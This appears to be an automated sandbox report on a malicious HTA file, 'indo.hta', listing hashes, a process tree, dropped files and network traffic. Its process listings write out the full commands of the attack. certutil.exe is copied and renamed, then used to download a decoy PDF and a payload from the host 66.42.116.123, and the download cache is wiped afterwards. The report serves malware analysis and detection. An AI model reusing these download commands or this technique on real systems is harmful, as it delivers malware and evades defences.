download: | indo.hta |
Full analysis: | https://app.any.run/tasks/c8aeb3f9-1d34-475c-8509-68844ea1472d |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 14:49:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 8F5D828C34CB6B9064F42D29A40E6554 |
SHA1: | 373030101CB384BA03537272625BE489193B232D |
SHA256: | 838E0B3854FCDA53EBD689C9B9F004A20DEAF5B78761211A4D4C31E94ED583FF |
SSDEEP: | 96:qW6b7p6xD2qXv+eRuJ2jXtvji/MxUGdmAxrzB1ke7cMTWZBzzIL8nJ2:qn7YxNv+eRuU7tcMZdBrzBye7cZEYnM |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\indo.hta" | C:\Windows\System32\mshta.exe | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) | | | | |
128 | "C:\Windows\System32\cmd.exe" /c echo cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" >C:\Users\admin\AppData\Local\Temp\cp13.bat | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
2744 | "C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\cp13.bat | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
3660 | cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
2396 | "C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/id-tax-info-2017-january-en.pdf" C:\Users\admin\AppData\Local\Temp\"id-tax-info-2017-january-en.pdf" | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
2868 | C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/id-tax-info-2017-january-en.pdf" C:\Users\admin\AppData\Local\Temp\"id-tax-info-2017-january-en.pdf" | C:\Users\admin\AppData\Local\Temp\windows.cpl | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: CertUtil.exe; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
3368 | "C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/id-tax-info-2017-january-en.pdf" delete | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
3836 | C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/id-tax-info-2017-january-en.pdf" delete | C:\Users\admin\AppData\Local\Temp\windows.cpl | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: CertUtil.exe; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
3248 | "C:\Windows\System32\cmd.exe" /c start C:\Users\admin\AppData\Local\Temp\"id-tax-info-2017-january-en.pdf" | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
3412 | "C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/indo.dat" C:\Users\admin\AppData\Local\Temp\windat.dat | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OGX14S2CVW6APHH7F3XZ.temp | — | — | — |
3692 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal | — | — | — |
2868 | windows.cpl | C:\Users\admin\AppData\Local\Temp\id-tax-info-2017-january-en.pdf | — | D49A3D9709244829EC21A5DAE87FE6A0 | F315C056A1BCC7634418470D74953E1F0B8E8C9CC0FB775B877451B47423578B |
3692 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages | sqlite | 0B8BDBB076B08E5036ED7E9D59564860 | 60E1FE70C2C455F22D9BE3E19CAB4FF36C4D12D92B5058EE5CE71A8C8373E3EB |
2240 | windows.cpl | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2708BF105D2523DEAE180BEECA6BC20D | binary | 2FD86666C4641D3EFAC708153822BA21 | 65130CD9DB4980C2C379F649AEEC92CB6E3DECC38313F6326DCE42A38384CCE9 |
3928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
3928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a658.TMP | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
2240 | windows.cpl | C:\Users\admin\AppData\Local\Temp\windat.dat | text | D5F8E94411FCCD62CD4A0B162B5A30A3 | E146A9CD989B2E5EA6FD57CD2B65499BFB09ECA97BEA2CFE9A4AE2CD55D6948E |
2868 | windows.cpl | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\id-tax-info-2017-january-en[1].pdf | — | D49A3D9709244829EC21A5DAE87FE6A0 | F315C056A1BCC7634418470D74953E1F0B8E8C9CC0FB775B877451B47423578B |
3952 | windows.cpl | C:\Users\admin\AppData\Local\Temp\windat.ps1 | text | 546D9112C16E89EF10CE200B1AF2010B | 0873AF729FA0E21F7CC5B4D746C4D4715A6CBC37F4CC301A87FF52F33A16ECC4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2868 | windows.cpl | GET | 200 | 66.42.116.123:80 | http://66.42.116.123/download/id-tax-info-2017-january-en.pdf | US | pdf | 326 Kb | suspicious |
2240 | windows.cpl | GET | 200 | 66.42.116.123:80 | http://66.42.116.123/download/indo.dat | US | text | 117 Kb | suspicious |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip | DE | — | — | whitelisted |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/278_15_23_20070.zip | DE | — | — | whitelisted |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip | DE | — | — | whitelisted |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip | DE | — | — | whitelisted |
3696 | mscorsw.exe | GET | 200 | 13.107.4.50:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 55.2 Kb | whitelisted |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip | DE | — | — | whitelisted |
2868 | windows.cpl | GET | 200 | 66.42.116.123:80 | http://66.42.116.123/download/id-tax-info-2017-january-en.pdf | US | pdf | 326 Kb | suspicious |
2240 | windows.cpl | GET | 200 | 66.42.116.123:80 | http://66.42.116.123/download/indo.dat | US | text | 117 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3696 | mscorsw.exe | 66.42.116.123:443 | — | — | US | suspicious |
2868 | windows.cpl | 66.42.116.123:80 | — | — | US | suspicious |
4024 | AcroRd32.exe | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
2240 | windows.cpl | 66.42.116.123:80 | — | — | US | suspicious |
— | — | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
3696 | mscorsw.exe | 13.107.4.50:80 | www.download.windowsupdate.com | Microsoft Corporation | US | whitelisted |
4024 | AcroRd32.exe | 92.122.195.163:80 | acroipm2.adobe.com | Akamai International B.V. | DE | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.download.windowsupdate.com | — | whitelisted |
acroipm2.adobe.com | — | whitelisted |
armmf.adobe.com | — | whitelisted |
ardownload2.adobe.com | — | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2868 | windows.cpl | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
2240 | windows.cpl | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |